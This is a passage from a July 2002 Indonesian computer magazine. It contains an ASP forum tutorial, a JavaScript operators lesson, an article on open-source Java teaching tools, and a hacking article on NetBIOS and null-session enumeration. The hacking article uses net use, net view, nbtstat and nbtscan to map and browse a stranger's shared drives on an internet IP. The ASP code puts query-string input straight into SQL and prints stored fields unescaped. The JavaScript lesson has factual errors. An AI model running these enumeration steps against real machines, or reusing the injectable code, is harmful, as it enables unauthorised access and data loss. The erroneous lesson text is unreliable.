Exit ForEnd IfNext%></TABLE><!--Membuat tombol pengatur halaman--><FORM ACTION=list.asp METHOD="POST"><INPUT TYPE="Hidden" NAME="hlm" Value="<%= hlm %>"><% If hlm > 1 Then %><INPUT TYPE="Submit" Name="tombol" Value="Sebelumnya"><% End If %><% If hlm < objRset.PageCount Then %><INPUT TYPE="Submit" Name="tombol" Value="Selanjutnya"><% End If %></FORM><p align="left"><a href="formforum.asp">JoinForum</a></p></body></html>

Setelah mengatur halaman, kini kita akan menampilkan datayang akan diulang selama data tidak lebih dari 50 (yang telahkita atur sebelumnya) dan data akan menuju ke data berikut-nya selama isi dari data belum berakhir.

<FORM ACTION=list.asp METHOD="POST"><INPUT TYPE="Hidden" NAME="hlm" Value="<%= hlm%>"><% If hlm > 1 Then %><INPUT TYPE="Submit" Name="tombol"Value="Sebelumnya"><% End If %> <% If hlm < objRset.PageCount Then %><INPUT TYPE="Submit" Name="tombol"Value="Selanjutnya"><% End If %></FORM>

Satu hal yang berperan sangat penting pada halaman iniialah tombol yang kita gunakan untuk menuju ke halamansebelumnya dan selanjutnya. Penamaan tombol ini ter-gantung pada kondisi.

6. Halaman untuk menampilkan isi dari forumatau sebuah topik (isiforum.asp)Ketikkan kode berikut pada editor kesayangan anda.Hasilnya seperti berikut:

Keterangan skrip ASP:Dim objConnDim ObjRsetDim filePathDim strSQLDim tombolDim hlmDim nofilePath = Server.MapPath("forum.mdb")Kat = Request.QueryString("kat")strSQL = "SELECT * FROM Data WHERE Topik='" & Kat &"'"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;DataSource=" & filePathSet objRset = Server.CreateObject("ADODB.Recordset")objRset.Open strSQL, objConn, adOpenStatic,adLockOptimistic, adCmdText

Skrip ini berfungsi untuk membuka koneksi ke basisdatabernama “forum.mdb” dan mengambil string yangdikirim dari formulir yang berada pada address browseranda, dan menyimpannya ke variabel. Dan setelahkoneksi dengan basisdata tersambung, maka otomatisrecord yang dimaksud akan aktif dan kita tinggalmenampilkan data menggunakan:

"<%=objRset(nomor_urut_field_pada_database)%>

NeoTutor

20 NeoTek Juli 2002

<html><head><title>Forum</title></head><body><!--#Include File=adovbs.inc--><table border=0 width="100%"><tr><td width="100%" height=191 valign=topalign=left><p align=left><b><font color="#FF00FF" face=Arial size=2><%Dim objConnDim ObjRsetDim filePathDim strSQLDim tombolDim hlmDim nofilePath = Server.MapPath("forum.mdb")Kat = Request.QueryString("kat")strSQL = "SELECT * FROM Data WHERE Topik='" & Kat & "'"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & filePathSet objRset = Server.CreateObject("ADODB.Recordset")objRset.Open strSQL, objConn, adOpenStatic, adLockOptimistic, adCmdText%><CENTER><HR></font></b><TABLE BORDER=1 width=60%><TR><TH width=50% align=left bgcolor="#303430"><font face="Times New Roman" size=3 color="#FFFFFF">Pengirim</font></TH><TH width=167 align=left bgcolor="#303430"><font face="Times New Roman" size=3 color="#FFFFFF">Alamat E-Mail</font></TH></TR><font color="#FF00FF" face=Arial size=2><TR><TD width=50% align=left bgcolor="#F0F0F0"><%=objRset(3)%></TD><TD align=left width=167 bgcolor="#F0F0F0"><%=objRset(4)%></TD></TR></font></TABLE><TABLE width=600><b><font color="#FF00FF" face=Arial size=2><tdwidth=608 align=center><hr></font><table border=1 height=52><tr><td width="100%" align=center bgcolor="#303430"height="100%"><b><font face="Times New Roman" size=3><fontcolor="#FFFFFF"><%=objRset(5)%></font></font></b></td></tr></center><tr><tdwidth="100%" bgcolor="#F0F0F0" height=21 align=center><textarea rows="11"cols="72"><%=objRset(6)%></textarea></td></tr></table><CENTER><hr align=center></center></table>

</b> <p><a href="formforum.asp?kat=<%=objRset(5)%>">Reply</a> <p><a href="default.asp">Kembali Ke Halaman Utama</a></table><%objRset.closeobjConn.closeSet objRset = NothingSet objConn = Nothing%></body></html>

Jika ada pertanyaan seputar tutorial ini anda dapatmengirimkan email anda ke

david_sugianto2002@yahoo.com

Kini anda telah membuat forum untukmenambah fasilitas pada Web anda

dengan gaya milis.Anda dapat mengubah tampilan

baik kata maupun warna selamaperubahan tersebuttidak mengganggu

jalannya skrip ASP.

NeoTutor

Juli 2002 NeoTek 21

DefinisiOperator adalah simbol-simbol khusus yang digunakan untukmelakukan operasi tertentu terhadap nilai atau variabel.

Dalam Javascript, operator dapat digolongkan menjadibeberapa kelompok, yaitu:

Operator AritmatikaYaitu operator yang digunakan untuk melakukan operasi-operasi matematika. Secara garis besar dibedakan atas:

a. Operator BinaryYaitu operator yang melakukan operasi terhadap dua operand.Operand adalah nilai atau variabel yang dioperasikan. Yangtermasuk dalam kategori operator Binary adalah:

Perhatikan contoh penggunaan operator-operator tersebut dibawah ini :

b. Operator UnaryYaitu operator yang melakukan operasi terhadap satu operand.Yang termasuk dalam kategori operator Unary yakni sebagaiberikut :

Perhatikan contoh penggunaan operator-operator tersebut dibawah ini :

Assignment OperatorDisebut juga Operator Penugasan, yakni operator yang digu-nakan untuk melakukan tugas mengisi nilai suatu variabel.Yang termasuk dalam kategori operator assignment yaknisebagai berikut:

OperOperatorator padapada JavaScriptJavaScriptPada bagian ketiga dari tutorial JavaScript ini kami memperkenalkan Operator. Operator memegang peran

kunci dalam pemrograman dengan JavaScript sehingga pemahaman mengenai unsur ini dalammempelajari JavaScript mutlak diperlukan.

Operator Deskripsi

//contoh 3.1var x = 7var y = 3var z//operasi penjumlahanz = x + y // variabel z mempunyai nilai 10//operasi penguranganz = x - y // variabel z mempunyai nilai 4//operasi perkalianz = x * y // variabel z mempunyai nilai 21//operasi pembagianz = x / y // variabel z mempunyai nilai 2//operasi sisa pembagianz = x % y // variabel z mempunyai nilai 1

+ Penjumlahan- Pengurangan* Perkalian/ Pembagian% Modulus atau Sisa Bagi

Operator Sintaks Deskripsi

= x = y x = y+= x += y x = x + y-= x -= y x = x - y*= x *= y x = x * y/= x /= y x = x / y%= x %= y x = x % y

Operator Deskripsi

++ Penambahan satu angka (increment)-- Pengurangan satu angka (decrement)

///contoh 3.2var x = 7var y = 3

x++ //variabel x nilainya bertambah satu // sehingga nilai variabel x sekarang adalah 8

y-- //variabel y nilainya bertambah satu // sehingga nilai variabel y sekarang adalah 2

NeoTutor

22 NeoTek Juli 2002

Operator PerbandinganYaitu operator yang digunakan untuk membandingkan duanilai dan akan menghasilkan dua kemungkinan nilai saja,apakah itu True atau False. Yang termasuk dalam kategorioperator perbandingan yakni sebagai berikut:

Operator LogikaYaitu operator yang digunakan untuk merangkaikan ataumerelasikan nilai logika operand-operand dan menghasilkandua kemungkinan nilai saja, True atau False. Yang termasukdalam kategori operator logika adalah:

Operator StringYaitu operator yang digunakan untuk merangkaikan ataumemanipulasi string. Simbol yang digunakan adalah tandaplus (+) yang kegunaannya adalah untuk merangkaikan duastring atau lebih menjadi satu string.

Perhatikan contoh penggunaannya di bawah ini :

Operator BitwiseYaitu operator yang digunakan untuk operasi dalam bilanganbiner. Operand-operand yang dioperasikan oleh operatorbitwise harus dalam integer atau karakter. Yang termasukdalam kategori operator bitwise yakni sebagai berikut:

Presedence OperatorApabila lebih dari satu operator digunakan bersamaan dalamsatu statement, maka pengerjaan operasi didasarkan prioritas.Operator yang memiliki prioritas lebih tinggi akan didahulu-kan meskipun ditulis belakangan. Berikut adalah urutanprioritas operator, dari atas ke bawah sesuai prioritasnya.

Perhatikan contoh berikut : y = 2 + 5 * 7Pada contoh di atas, operasi yang akan dikerjakan terlebihdahulu adalah operasi perkalian antara bilangan 5 dengan 7,baru kemudian hasil operasi tersebut dijumlahkan dengan dua,meskipun operator perkalian di belakang, namun akan didahu-lukan dalam eksekusi, karena prioritasnya lebih tinggi.

Lalu bagaimana jika kita menginginkan operasi penjumlahandidahulukan sebelum perkalian? Solusinya adalah denganmemberi tanda kurung untuk mengelompokkan operasi.Operasi yang bertanda kurung akan dianggap sebagai satukesatuan yang tidak dapat dipisah, sehingga program akanmengeksekusi terlebih dahulu. Dengan sedikit modifikasi,contoh di atas menjadi: y = (2 + 5) * 7

Jadi operasi penjumlahan terhadap bilangan 2 dan 5 dilakukanterlebih dahulu, baru hasilnya dikalikan dengan bilangan 7.Hasilnya, nilai variabel y akan berbeda. Pada contoh di atasnilai variabel y 37, sedangkan pada contoh ini 49.

EkspresiDefinisiEkspresi dapat dikatakan sebagai kombinasi dari variabel,konstanta dan operator.Ekspresi dapat dibedakan atas:a. Ekspresi yang mengembalikan nilai. Contoh : x = 6

Ekspresi di atas mengembalikan nilai variabel x kepadabilangan 6

b. Ekspresi yang memanipulasi nilai. Contoh : y = y + 5

Ekspresi di atas memanipulasi nilai variabel y menjadi nilaisebelumnya ditambah dengan bilangan 6.

// contoh 3.3var str1, str2, str3str1 = “Belajar”str2 = “Javascript”

str3 = str1 + str2 // str3 = "Belajar Javascript"

str1 = “Belajar”str2 = “Javascript”

str3 = str1 + “” + str2 //str3 = “Belajar Javascript”

Operator Deskripsi Contoh

== Sama dengan 1==2 //false!= Tidak sama dengan 1!=2 //true> Lebih besar 1>2 //false< Lebih kecil 1<2 //true>= Lebih besar sama dengan 1>=2 //false<= Lebih kecil sama dengan 1<=2 //true

Operator Deskripsi Contoh

&& Operasi and x && yHanya bernilai true jikamasing-masing x dan ybernilai true

|| Operasi or x || yHanya bernilai false jikamasing-masing x dan ybernilai false

! Operasi not !x Bernilai kebalikan dari nilai x

Operator Sintaks Deskripsi

& x & y Hanya bernilai 1 jika kedua operand bernilai 1

Operator Sintaks Deskripsi

| x | y Hanya bernilai 0 jika kedua operand bernilai 0

^ x ^ y Bernilai 1 jika salah satu operand bernilai 1

>> x >> y Menggeser x ke kanan sebe-sar y bit (x dalambinari)

>>> x >>> y Menggeser x ke kanan sebe-sar y bit dan memasukkan nilai nol dari kiri

Operator Deskripsi

++, --, -, ! Inc, Dec, Minus, Not*, /, % Perkalian, Pembagian, Modulus+, -, + Penjumlahan, Pengurangan, Gabung String<<, >>, >>> Pergeseran<, <=, >, >= Lebih kecil, Lebih kecil sama dengan, Lebih

besar, Lebih besar sama dengan==, != Sama dengan, Tidak sama dengan& And bit^ Xor bit| Or bit&& And logika|| Or logika

NeoEdu

Juli 2002 NeoTek 23

ADA KEBANYAKANuniversitas, Javamenjadi sebuah

bahasa pemrograman utamayang digunakan dalam sebuahkonsep pengajaran bahasapemrograman [1]. Java jugasecara terus menerus diguna-kan dalam setiap mata-pela-jaran bagi para mahasiswa,contoh-contoh praktis dan

tentu saja dalam pemberiantugas. Dan ini umumnya me-miliki pengaruh yang sangatkecil atau bahkan tidak adasama sekali terhadap sikluskonsep pengajaran dan pem-belajaran (teaching andlearning) bahasa pemrogram-an dan bahasa pemrogramanitu sendiri dalam komunitasuniversitas. Karena siklus ini

masih mengikuti polatradisional:

• Pengajar (guru, dosen)mempersiapkan bahan-bahankuliah, latihan dan tugas.

• Pengajar memberikanbeberapa kuliah awal padamata kuliah tertentu (dalamhal ini adalah bahasapemrograman Java).

• Mahasiswa kemudianmempelajari mata kuliah ter-sebut dengan membaca bukubuku yang telah dirujukkandan beberapa bahan pendidik-an. Para mahasiswa kemudi-an juga mencoba melatihaktivitas pemrograman de-ngan menuliskan programbahasa Java mereka masing-masing.

• Mahasiswa menyelesaikantugas-tugas dan latihandalam mempersiapkan ujianyang akan ditempuhselanjutnya.

• Kemudian para mahasiswadapat memilih apakah inginberpartisipasi dalam kelom-pok diskusi dalam membahassetiap pertanyaan yang tim-bul dalam proses belajarmereka.

• Akhirnya mahasiwamelaksanakan ujian.

Pada saat ini, hampir seluruhuniversitas telah mendukungkonsep pengajaran dan pem-belajaran dengan mengguna-kan komputer sebagai sistempendukungnya. ComputerAssisted Learning and Com-puter Assisted Teaching(CAL+CAT) telah berkem-bang secara penuh dan diim-plementasikan pada sebuahinstitusi di Jerman yang ber-nama Lehrstuhl fuer Wirt-schaftsinformatik und Con-trolling an der UniversitaetMuenster (Department ofInformation Systems, Uni-versity of Muenster).

Untuk para pembaca yangmengerti bahasa Jermandipersilakan membaca lebihlanjut pada referensi [2].Model ini mempersilakan an-da untuk mengatur imple-mentasi dari proses pengajar-an dan pembelajaran sesuaidengan kebutuhan organisasianda. Sehingga anda dapatmenggunakan modelCAL+CAT untuk mendu-kung setiap instruksi, ter-masuk di dalamnya bahasa

PPemremrogrograman Javaaman Javadengan Tdengan Teknologi & Produk Open Sourceeknologi & Produk Open Source

Piranti lunak Open Source dapat membantu proses pendidikan secara umum dan proses pengajaran danpembelajaran bahasa pemrograman Java secara lebih khusus. Blasius Lofi Dewanto menunjukkan

hubungan antara NetBeans Java IDE (Integrated Development Environment), FSL (Freestyle Learning) danOpenUSS (Open University Support System) akan ditunjukkan dalam sebuah proses integrasi pengajaran

dan pembelajaran di dalam sebuah komunitas universitas.

P

Vendor Type

BlackBoard: www.blackboard.com LMS

eCollege: www.ecollege.com LMS

WebCT: www.webct.com LMS

CampusPipeline: ww.campuspipeline.com LMS

TutorsEdge: www.tutorsedge.com Virtual Classroom (synchronous communication)

Toolbook: http://home.click2learn.com/products/toolbook.html CBT/CAP

Macromedia Flash, Freehand, Director,Authorware: www.macromedia.com/software CBT/CAP

JBuilder: http://www.borland.com/jbuilder JDT

VisualAge: www.ibm.com JDT

Tabel 1. Vendor Komersial

NeoEdu

24 NeoTek Juli 2002

pemrograman Java.

Sebelum kita melihat modeltersebut mari kita melihatbeberapa model dari pirantilunak yang digunakan dalammodel CAL+CAT.Contohnya adalah:

Learning ManagementSystem (LMS)Ini merupakan kendaraanutama dalam mengaturproses pengajaran danpembelajaran. Kumpulanpiranti lunak ini didesainuntuk pengaturan padatingkat individu, ruang kuliahdan institusi. Piranti lunak

Communication Manage-ment (synchronous andasynchronous communic-ation) dapat juga diintegrasi-kan dengan LMS, entahsebagai bagian dari paketpiranti lunak atau sebagaikomponen stand-alone yangdapat dengan mudah diinte-grasikan ke dalam LMS.Karakter utama dari LMSadalah bahwa pengguna atauusers—dalam hal ini adalahpengajar dan pelajar—harusterkoneksi dengan Internetuntuk menggunakan perang-kat piranti lunak yang ada.

Computer Based Training(CBT)/Course AuthoringPackage (CAP)CBT adalah piranti lunakoffline yang mendukungproses pembelajaran secaralokal pada masing masingkomputer mahasiswa. Wa-laupun pada umumnya tipeperangkat piranti lunak inijuga bekerja secara online,kebanyakan para penggunalebih memilih memakai pi-ranti lunak dari sebuah CD-ROM karena lebar band-width yang dibutuhkan un-tuk memproses CBTs' largevideos dan interaksi client/

server. CAP biasanya diguna-kan untuk mengembangkanisi pada piranti lunak CBT.

Java Development Tools(JDT)

JDT sebuah lingkungan dimana para mahasiswa dapatmemperoleh pengalamanpraktis (hands-on experience)dalam pemprograman denganmenggunakan Java. Pirantilunak JDT pada umumnyadipasang pada masing masingkomputer mahasiswa dandigunakan secara offline. Texteditors, compilers dandebuggers masuk dalamkategori ini.

Sekarang setelah kita sedikitmengenal mengenai perleng-kapan CAL+CAT, marilahkita melihat bagaimana per-lengkapan ini digunakan da-lam siklus pendidikan. Gam-bar di atas memberikan se-buah pandangan rinci me-ngenai bagaimana sebuahproses pengajaran dan pem-belajaran bahasa pemrogram-an Java dapat dibantu denganpiranti lunak CAL+CAT.

Vendor Komersial &Open Source SoftwareSupport

Beberapa perlengkapan piran-ti lunak komersial mengha-silkan aplikasi yang dapatdigunakan dalam prosespendidikan. Tabel 1 membe-rikan gambaran singkatmengenai beberapa perusa-

• Proses teaching and learning yang didukung oleh aplikasi piranti lunak

Open Source Type Programming language

ClassWeb Open Source Distribution: http://classweb.ucla.edu LMS PHP templates and PerlCGI scripts

The Manhattan Virtual Classroom: http://manhattan.sourceforge.net LMS CGI in C language

ShadowNetworkspace: http://sns.internetschools.org LMS CGI scripts C and Perl

Authenticated User Community (AUC): http://auc.sourceforge.net LMS CGI scripts C and Perl

OpenUSS: http://openuss.sourceforge.net LMS Java (J2EE)

Freestyle Learning: http://www.wi.uni-muenster.de/aw/freestyle-learning/english/eindex.htmFSL is a fully developed product already in use at theUniversity of Muenster. This project was recently declared an open source project.

jEdit: http://jedit.sourceforge.netJDTJava (Swing)

Jext: http://jext.sourceforge.net JDT Java (Swing)

NetBeans: http://www.netbeans.org JDT Java (Swing)

Tabel 2. Open Source Software

CBT/CAP Java (Swing)

NeoEdu

Juli 2002 NeoTek 25

haan yang bergerak dibidang tersebut diatas.

Lalu bagaimana dengan piranti lunakopen source ? Apakah ada alternatifpiranti lunak open-source terhadapproduk-produk yang telah beredar ditabel 1 ? Tentu saja jawabannya adalahyes! Kita patut berterima kasih terhadapbesarnya aktifitas dalam pengembanganpiranti lunak open source dalambeberapa tahun terakhir ini, versi opensource saat ini telah beredar pula bagihampir disemua perangkat aplikasipendidikan. Tab. 2 menunjukkanbeberapa sumber pendidikan denganopen source.

Pada saat ini, satu-satunya portal bagiproduk piranti lunak open source dibidang pendidikan adalahCampusSource(http://www.campussource.de dalambahasa Jerman atauhttp://www.campussource.org dalambahasa Inggris). CampusSource adalah

sebuah proyek institusi di Jerman yangmemiliki beberapa proyek yangbernaung di bawah payung mereka(termasuk didalamnya OpenUSS).Seluruh proyek yang bernaung dibawahCampusSource menggunakan GPLsebagai bentuk lisensi mereka. Tujuanutama dari CampusSource adalah untukmengumpulkan dan mengintegrasikanseluruh proyek piranti lunak opensource yang ada di bidang pendidikan.

Alternatif penggunaan open sourceadalah sama efektifnya atau bahkanuntuk sesuatu alasan lebih baikdibandingkan dengan rekan-rekan yangkomersial, sehingga tidak ada sebuahalasan yang nyata untuk tidakmenggunakan piranti lunak open sourcedalam bidang pendidikan - terutamadalam proses pengajaran danpembelajaran bahasa Java sebagaisebuah programming language. Olehkarenanya piranti lunak Open sourcemempersembahkan sebuah sumber

yang sangat amat berharga bagi duniapendidikan, yang kerap kali tidakmemiliki banyak sumber sumberkeuangan untuk membeli produkkomersial.

* Blasius Lofi Dewanto (dewanto@uni-muenster.de) adalah asisten riset diWestfälische Wilhelms-Universität Muenster,Jerman Institut für WirtschaftsinformatikLehrstuhl für Wirtschaftsinformatik undControlling dan arsitek utama pengembangOpenUSS (Open University SupportSystem).

References[1] Stewart, B. (2001): Java as a TeachingLanguage, dihttp://java.oreilly.com/news/teachjava_0101.html[2] Konsep CAL+CAT (semua makalahdalam bahas Jerman) dapat ditemukan dihttp://www.wi.uni-muenster.de/aw/abcalcat.htm

ntuk menginstalasi OpenUSS dengan benar,langkah-langkah berikut perlu diikuti:

Instalasi Java Virtual machineSemua komponen pada OpenUSS mengguna-kan JDSK 1.2.2 dari Sun Microsystem. Dengandemikian yang pertama kali harus anda laku-kan adalah menginstalasi JDSK ini pada plat-form pilihan anda. Khusus untuk platformWindows, dapat juga menggunakan J2EE 1.1.

Data LayerDatabase default yang digunakan oleh OpenUSS adalahHyupersonicSQL, InstantDB, atau InterBase. Pada versialfa ini, pada OpenUSS yang di-download sudahdisediakan HypersonicSQL, jadi anda tidak usahmenginstalasinya sendiri. Apabila hendak menggunakandatabase lain, maka OpenUSS harus dikonfigurasi ulangsendiri.

Business Object LayerUntuk menjalankan Business Objectdigunakan server JOnAS (Java OpenApplication Server). Selama versifinal Enhydra enterprise belum di-release, kita harus menggunakanJOnAS secara terpisah. Anda harusmenginstalasi JOnAS terlebih dahu-lu sebelum menginstalasi OpenUSS.

Presentation LayerInstall Enhydra untuk layer ini.Enhydra adalah server aplikasipertama untuk Java/XML yangbersifat open source.

OpenUSSOpenUSS didistribusikan sebagai file ZIP. Install OpenUSSsetelah menginstalasi komponen-komponen di atas.

Penjelasan Ringkas OpenUSS (versi alfa)

U

NeoTekno

26 NeoTek Juli 2002

ETELAH MELAKUKAN 'PEKERJAAN RUMAH' MENCARIinformasi secara non-intrusif lewat proses foot-printing dan scanning, kini sang hacker sudah

tahu sasaran yang dituju. Proses selanjutnya, yang disebutenumerasi, adalah proses pencarian informasi lebih lanjutlagi untuk mematangkan serangan. Perbedaan enumerasidengan kedua proses sebelumnya adalah tingkat intrusinya,yang karenanya mengharuskan hacker untuk log in kesasaran. Hal ini membuatnya dapat dikenali.

Informasi yang dikumpulkan pada proses enumerasi sudahsangat spesifik terhadap sasaran yang dituju:

Network resource dan shareUser dan groupAplikasi dan banner

Sepintas informasi yang dikumpulkan tampak tidak berba-haya, namun informasi yang bocor dari lubang-lubang inidapat menjadi awal serangan hacking. Pada umumnya, se-kali hacker mendapatkan user name yang absah, makatinggal tunggu waktu saja sebelum intruder ini menebakpassword untuk user name itu yang kemudian terhubungke kelemahan yang ada pada protokol resource sharing yangbersangkutan. Dengan jalan menutup kelemahan ini, andadapat menghilangkan tempat awal hacker menjejakkan kakinya.

Pada artikel 'Legion v.1.2: Gampang Kok Jalan-jalan ke Kom-puter Orang' ditunjukkan bagaimana enumerasi denganLegion, suatu NetBIOS scanner, akan dengan cepat me-nunjukkan file atau disk yang di-share dan apakah shareitu diproteksi dengan password atau tidak. Bila tidak, makafile dan disk itu langsung jadi milik sang hacker sedangkanbila diproteksi dengan password masih dapat ditebak denganBrute Force tool.

Proses enumerasi bersifat spesifik menurut sistem opera-sinya. Pada bahasan kali ini akan dibahas proses enumerasiterhadap sistem Windows NT/2000 yang juga berlaku un-tuk Windows 95/98/ME. Bahasan juga dibatasi hanya padanull-session dan NetBIOS scanning. Adapun enumerasi

SNMP, DNS Zone Transfer, Host Enumeration, Active Direct-ory Enumeration, Banner Grabbing, dan Registry Enume-ration akan dibahas di kesempatan mendatang.

Windows NT/2000 Hacking KitSejak Windows NT 3.1, Microsoft telah menyediakan do-kumentasi tambahan dan CD ROM yang berisi utilitasuntuk administrasi network: Windows NT Resource Kit(NTRK). CD ROM ini berisi utilitas yang hebat-hebat,mulai dari implementasi Perl scripting untuk mem-portingberbagai macam utilitas Unix sampai remote administra-tion tool.

Tool-tool ini selain dapat digunakan oleh administratornetwork, dapat juga digunakan oleh intruder. AkibatnyaNTRK mendapat julukan 'The Windows NT Hacking Kit.'Beberapa dari tools ini dapat di-download gratis di ftp://ftp.microsoft.com/bussys/winnt/winnt-public/reskit. Windows2000 juga menyediakan tool-tool seperti ini. Pada Windows2000 Server CD terdapat utilitas yang lazim digunakan olehpara hacker dalam folder Support\Tools.

Untuk mengurangi kemungkinan serangan, walaupun me-miliki tool-tool di atas, para administrator network yangmenggunakan Windows NT dianjurkan untuk tidak meng-instalasi semuanya. Cukup instalasi yang perlu-perlu sajapada server. Biasanya administrator network menempatkantool-tool ini pada removable disk hanya untuk keperluanmaintenance jaringan.

Enumerasi Paling Gawat: Null-SessionWindows NT sangat tergantung pada CIFS/SMB dan NetBIOSuntuk menjalankan fasilitas network-nya. Standar CIFS/SMB dan NetBIOS ini sangat 'bawel' karena memberikanbanyak informasi pada siapa saja yang memasuki mesin inimelalui port TCP 139.

Jadi langkah awal untuk masuk ke dalam sistem ini secararemote (bila dari hasil port scan diketahui bahwa port 139sedang listen) adalah melakukan koneksi tanpa otentikasi

EnumerEnumerasiasiMematangkan SerMematangkan Seranganangan

Enumerasi adalah langkah terakhir yang perlu dilakukan seorang hacker untuk mengumpulkan informasimengenai sasaran yang akan ditujunya. Proses enumerasi bersifat spesifik berdasarkan sistem operasinya.

Pada bahasan kali ini diuraikan proses enumerasi terhadap sistem Windows NT/2000 maupun 9x.

S

NeoTekno

Juli 2002 NeoTek 27

ke system NT/2000 (disebut null-session, sebab tanpa username serta tanpa password). Misalkan kita mencoba prosesnull-session ke IP Address 203.125.135.11 sebagai berikutdari Windows NT:

C:\>net use \\203.125.135.11\IPC$ “” /u:””

Yang berarti melakukan koneksi ke komunikasi interprosestersembunyi IPC$ (share) pada IP address 203.125.135.11sebagai user anonim (/u:””) dengan password kosong (“”).

Pada Windows 95/98/ME perintahnya adalah

C:\>net use \\203.125.135.11\IPC$

Terlihat bahwa proses null-session dapat dilaksanakan ter-hadap komputer yang terhubung ke Internet dengan IPAddress tersebut. Ini menandakan bahwa komputer yangbersangkutan sangat rawan terhadap hacking.

Dengan berhasilnya melaksanakan proses null-session, makaintruder kini mendapatkan channel terbuka untuk mencarisegala macam informasi network seperti share, user, group,Registry key, dan lain sebagainya. Kelemahan ini dikenalsebagai 'Red Button vulnerability,' null-session connection,atau anonymous logon, dan merupakan pijakan pertamapenyerang pada sistem anda yang dapat sangat merusak.

NT/2000 Network EnumerationYang pertama kali dicari intruder adalah ada apa saja padanetwork NT/2000. Karena NT/2000 sangat tergantung padaNetBIOS naming service (UDP 137), maka kegiatan ini se-ring kali disebut sebagai “enumerating the NetBIOS wire.”

Tragisnya semua ini telah terpasang pada sistem operasi Win-dows itu sendiri! Kita akan membahas beberapa commandline yang sehubungan dengan network yang merupakanperintah-perintah standar pada NT/2000 maupun 95/98/ME.

Enumerasi Domain dengan net viewPerintah net view adalah contoh bagus dari tool enume-rasi yang sudah built-in dalam sistem operasi Windows.

Perintah untuk melihat domain yang ada padan NT/2000:

C:\>net view /domain

Sedangkan untuk melihat apa yang terdapat pada domaintertentu perintahnya adalah (sebagai contoh melihat apayang ada dalam domain Neotek):

C:\>net view /domain:NeoTek

Sedangkan pada Windows 95/98/ME perintah yang setaraadalah

C:\>net view

Perintah ini akan memperlihatkan apa saja yang ada padaLAN (local area network). Pada contoh ini adalah ketiga

komputer pada network peer-to-peer milik redaksi NeoTek,masing-masing komputer dengan nama JESSICA, KARINA,dan KOSASIH. Karena peer-to-peer, ketiga komputer itumerupakan server bagi yang lain.

Untuk melihat share apa saja pada komputer dengan namaKARINA pada network NeoTek (IP address 192.168.123.187)dapat digunakan perintah:

C:\> net view \\karina

atau

C:\>net view \\192.168.123.187

Terlihat bahwa pada domain NeoTek terdapat komputerdengan nama KARINA dan komputer itu mempunyaiempat share resources, yaitu satu printer (BROTHER) dantiga disk dengan drive letter C, D, dan E.

Sekarang kita melangkah lebih jauh, keluar dari networksendiri dan mencoba melihat komputer orang lain yangjuga terhubung ke Internet. Karena mampu melihat apayang ada pada suatu IP Address, sebenarnya kita tentunyadapat juga melihat apa yang ada pada suatu IP Address darikomputer yang di luar network kita sendiri. Syaratnya asal-

NeoTekno

28 NeoTek Juli 2002

kan port UDP 139 komputer yang bersangkutan terbuka.Misalkan kita lihat apa yang ada pada komputer dengan IPAddress 203.125.135.46

C:\>net view \\203.125.135.46

Nah, terlihat bahwa komputer (entah milik siapa) yangterhubung ke Internet pada IP Address 203.125.135.46mempunyai tiga share resources, yaitu disk C dan dua fileyang dinamakan MOCAZH dan MSOFFICE.

Kembali ke perintah net use yang melaksanakan null-session. Apabila perintah itu dimodifikasi sebagai berikut:

C:\>net use G: \\203.125.135.46\MOZACH

Maka share itu di-mapping menjadi drive G: di komputerkita dan dapat kita perlakukan sebagai hard disk kita sen-diri (yang berarti kita dapat meng-copy, men-delete, atau-pun menambahkan file di-share itu). Jadi setelah perintahitu, tinggal ketikkan:

C:\>cd G:

C:\>dir G:

Selanjutnya terserah anda. Teknik ini kini diotomatisasioleh NetBIOS scanning tool seperti misalnya Legion atauSharesFinder. Kedua software ini bersama NetBIOS scan-ning tool lain dapat diperoleh dalam CD NeoTek bulan ini.

Dari mana kita tahu bahwa ada komputer di suatu tempatyang terhubung ke Internet dan menyediakan dukunganNetBIOS seperti contoh di atas? Caranya dengan utilitasnbtscan yang dibahas berikut ini atau dengan menggunakanNetBIOS scanner seperti Legion atau SharesFinder (tetapikalau sudah menggunakan Legion yang memanfaatkanGUI, baris perintah DOS seperti di atas mungkin sudahtidak relevan lagi).

NetBIOS Name Table dengan nbtstat dan nbtscanBuilt-in tool lain yang hebat pada Windows adalah nbtstat,yang memanggil NetBIOS Name Table dari suatu sistem

remote. Pada contoh ini kita akan melihat NetBIOS namepada komputer KARINA (IP Address 192.168.123.187)pada LAN NeoTek serta komputer remote pada IP Address203.125.1345.46

C:\>nbtstat -A 192.168.123.187

C:\>nbtstat -A 203.125.135.46

Terlihat bahwa nbtstat mengekstrak system name(KARINA), domainnya (NEOTEK), dan user yang sedanglog-in (KARINA ISKANDARSJAH). Sedangkan padaremote computer percobaan kita system namenyaPROXY_COMPAQ, system namenya CAZH, dan useryang sedang log on PROXY_COMPAQ.

Kelemahan nbtstat adalah batasan untuk dapat memeriksasatu IP saja setiap kali. Hal ini diatasi oleh Alla Bezroutchkodengan menyediakan nbtscan yang dapat di-download dihttp://www.inetcat.org/software/nbtscan.htm atau terdapatdalam CD NeoTek bulan ini. Dengan nbtscan kita dapatmen-nbtstat dengan mudah suatu range IP dengan cepat.Kita coba untuk range IP pada LAN NeoTek (192.168.123.x)serta range IP eksternal yang sedang kita jadikan kelincipercobaan (203.125.135.x):

C:\>nbtscan 192.168.123.0/24

C:\>nbtscan 203.125.135.0/24

Terlihat baik pada network NeoTek maupun range IPAddress eksternal apa nama komputernya (NetBIOSName), apakah bertindak sebagai server atau tidak, siapauser yang sedang log on pada komputer yangbersangkutan, dan MAC Address dari komputer tersebut.

Komputer yang bertindak sebagai server itulah yang perlukita eksplorasi lebih lanjut apa share resource-nya

NetBIOS Code Resource

<computer name>[00] Workstation Service

<domain name>[00] Domain Name

<computer name>[03] Messenger Service (untuk pesan-pesan yang dikirim ke komputer ini)

<user name>[03] Messenger Service (untuk pesan-pesan yang dikirim ke user ini)

<computer name>[20] Server Service

<domain name>[1D] Master Browser

<domain name>[1E] Browser Service Elections

<domain name>[1B] Domain Master Browser

Penjelasan NetBIOS Code

(gunakan net view). Kemudian apakah share itu dapat kitaakses dengan menggunakan perintah net use untukmapping share itu ke komputer kita.

